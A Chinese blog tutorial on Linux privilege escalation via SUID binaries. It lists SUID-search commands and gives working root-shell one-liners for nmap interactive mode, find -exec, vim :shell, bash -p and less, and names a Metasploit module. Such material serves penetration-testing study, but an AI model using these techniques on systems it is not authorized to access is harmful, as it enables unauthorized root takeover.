美文网首页
【提权】Linux的SUID提权

【提权】Linux的SUID提权

作者: Pino_HD | 来源:发表于2018-05-15 21:38 被阅读0次

0x01 SUID

什么是suid?通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。

0x02 SUID提权

那么什么是suid提权呢?我理解的就是有个文件,它有s标志,并且他输入root,那么我们运行这个程序就可以有了root的权限,并且这个程序还得能执行命令,不然没什么用处,那么我们就能从普通用户提升到了root权限了。

0x03 常见的可用于suid提权的命令

Nmap

Vim

find

Bash

More

Less

Nano

cp

0x04 查找符合条件的文件

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

0x05 详细介绍

  • nmap
    老版的nmap(2.02-5.21)有相互的功能--interactive
nmap> !sh
sh-3.2# whoami
root

msf中也有相关的模块

exploit/unix/local/setuid_nmap
  • find

如果find以SUID权限运行,所有通过find执行的命令都会以root权限运行。

touch test
find test -exec whoami \;
  • vim

如果vim以SUID运行,就会继承root用户的权限,可以读取系统中所有的文件

vim/vi
:shell
  • bash
bash -p
># id
  • less/more
less /etc/passwd
!/bin/sh

相关文章

  • linux 提权-SUID提权

    前言 最近想着学习linux提权的一些姿势,这里简单分享学习SUID提权的一些知识点。 权限解读 先来父复习一下l...

  • 【提权】Linux的SUID提权

    0x01 SUID 什么是suid?通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。 0x02...

  • Linux提权

    0x00 Linux提权基础命令 0x01 Linux提权工具 Linux内核CVE提权(github):可能会导...

  • Linux SUID 提权 - 自动化检测脚本 suidchec

    suidcheck 一个简单的 bash 脚本,分享出来希望能对大家有点帮助. Linux SUID 提权检测脚本...

  • linux 提权-Crontab提权

    前言 记录一下linux提权系列的Crontab计划任务提权的学习过程。 crontab 命令 crontab命令...

  • linux 提权-sudo提权

    前言 最近听闻sudo刚刚出来了新漏洞,而最近正好在看linux提权这块知识点。借此梳理一下sudo提权相关的姿势...

  • Linux提权

    简单概述Linux的几种提权的办法。 内核溢出提权 mysql udf提权 上传库文件 执行库文件创建命令执行函数...

  • 17.提权

    提权方法:溢出漏洞提权、数据库提权(mysql提权(udf提权,mof提权,自启动提权)、mssql提权)、第三方...

  • linux提权

    虽然还没有看暗月的教程,但要提醒自己不要忘了···

  • linux提权

    http://bobao.360.cn/learning/detail/4512.html

网友评论

      本文标题:【提权】Linux的SUID提权

      本文链接:https://www.haomeiwen.com/subject/zcsydftx.html